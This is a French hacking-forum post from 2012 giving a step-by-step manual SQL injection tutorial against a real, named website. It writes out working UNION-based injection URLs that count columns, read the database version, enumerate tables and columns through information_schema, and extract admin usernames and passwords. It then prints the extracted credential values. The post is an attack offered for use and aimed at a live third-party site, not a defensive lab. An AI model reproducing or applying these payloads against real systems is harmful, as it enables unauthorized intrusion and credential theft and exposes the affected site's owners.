TehWoas Index du Forum
TehWoas
Site des challenges lobby
 
TehWoas Index du ForumFAQRechercherS’enregistrerConnexion

:: Injection SQL ::

 
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web
Sujet précédent :: Sujet suivant  
Auteur Message
TehWoas
Invité





MessagePosté le: Mar 18 Sep - 22:45 (2012)    Sujet du message: Injection SQL Répondre en citant

Injection SQL
Bonjour à tous,

Donc je vais faire un tutoriel pour exploiter une faille web façon manuel, ce tutoriel est donc sur les injections sql (sans tool)

Donc nous allons prendre ce site : http://www.maageetamandir.com/

J'inspecte le site, je regarde les pages etc ... "http://www.maageetamandir.com/pages.php?catid=7" hum lui il m'intéresse ... 


Maintenant pour voir si le site est faillible c'est simple je rajoute "'" au bout de l'adresse url.

Donc l'adresse url devient :


Code :

http://www.maageetamandir.com/pages.php?catid=7'


Et la ça nous donne :

Citation:

Citation :Fatal error: Uncaught exception 'Exception' with message 'Error in Select Query : select * from page_categories where categoryId ='7''' in /home/maageeta/public_html/database/class.Database.php:35 Stack trace: #0 /home/maageeta/public_html/pages.php(6): Database->select('select * from ...') #1 {main} thrown in /home/maageeta/public_html/database/class.Database.php on line 35

ERREUR --> Le site est faillible !

Maintenant pour exploiter le site nous avons besoin de savoir combien de colonnes il contient, pour sa il suffit d'ajouter "order by 10--"

Notre lien devient :


Code :

http://www.maageetamandir.com/pages.php?catid=7 order by 10--


Toujours une erreur, mais le site s'affiche presque normalement, essayons 9 !

Le lien devient donc :


Code :

http://www.maageetamandir.com/pages.php?catid=7 order by 9--


Le site s'affiche correctement 


Conclusion : Cela veux dire que le site contient 9 colonnes.

Nous devront a présent trouver la colonne qui nous permettra de soutirer les information de l'admin du site :

Pour faire ceci, on doit juste ajouter "-" avant le "7" et on doit remplacer "order by" par "union all select" .
ensuite après "union all select" vous ajouter les numéros des colonnes que vous avez trouvé, dans notre cas c'est "9" suivie par "--" , donc on ajoute "1,2,3,4,5,6,7,8,9--". des chiffres devrons apparaître dans le la page.

Notre lien sera :


Code :

http://www.maageetamandir.com/pages.php?catid=-7 union all select 1,2,3,4,5,6,7,8,9--


Nous avons trouvé que les colonnes accessible qui sont 3 et 4.

Nous allons utiliser la colonne 3.

Pour avoir la version de cette colonne , nous avons juste a remplacer le numéro de la conne souhaité , par "@@version"

Notre lien sera :


Code :

http://www.maageetamandir.com/pages.php?catid=-7 union all select 1,2,@@version,4,5,6,7,8,9--


la version de la BDD est 5, ont peut continuer dans ce cas.

Pour avoir le nom de la table , suffit de remplacer "@@version" par "table_name" et ont ajoute "from information_schema.tables" après le dernier numéro de colonne. dans notre cas :


Code :

http://www.maageetamandir.com/pages.php?catid=-7 union all selec 1,2,table_name,4,5,6,7,8,9 from information_schema.tables--


Donc la il vous faut trouver quelque chose avec admin, dans notre cas "snet_administrator"

Personnellement j'utilise ce site pour convertir vers du Ascii

http://www.cs.carleton.edu/faculty/adala...ascii.html

Donc on obtient :

Citation:

Citation :115, 110, 101, 116, 95, 97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114

A present, nous allons remplacer "table_name" par "column_name" et "information_schema.tables" par "information_schema.columns" et en fini avec "where table_name=char(le code ASCII)".

Dans notre cas on aura :


Code :

http://www.maageetamandir.com/pages.php?catid=-7 union all select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=char(115, 110, 101, 116, 95, 97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114)--


Nous avons vue qu'il y a une colonne qui ce nomme "admin_username" et une autre "admin_password" 


Nous allons supprimer tout ce qu'il y'a après 9, et ajouter "snet_administrator" , ensuite on remplace "column_name" par "concat(admin_username,0x3a,admin_password)"

0x3a est la valeur ASCII, qui permet de séparer le nom d'utilisateur du mot de passe.

Notre lien sera :


Code :

http://www.maageetamandir.com/pages.php?catid=-7 union all select 1,2,concat(admin_username,0x3a,admin_password),4,5,6,7,8,9 from snet_administrator


Conclusion : l'username est YaBnxpqdnaZqlmmimpmclmg%3D et le mot de passe est aKZqwsaZaZmVmmmamKzKlph

Par contre ce site c'est bien c'est qu'il a crypter username et mot de passe des utilisateurs, donc même si le site est faillible y a encore du travaille derrière pour casser le chiffrement ...


Revenir en haut
Publicité






MessagePosté le: Mar 18 Sep - 22:45 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Thème créé par TehWoas'
Powered by phpBB © 2012 phpBB Group
Traduction par : phpBB-fr.com
  • TehWoas™ ©2012-2013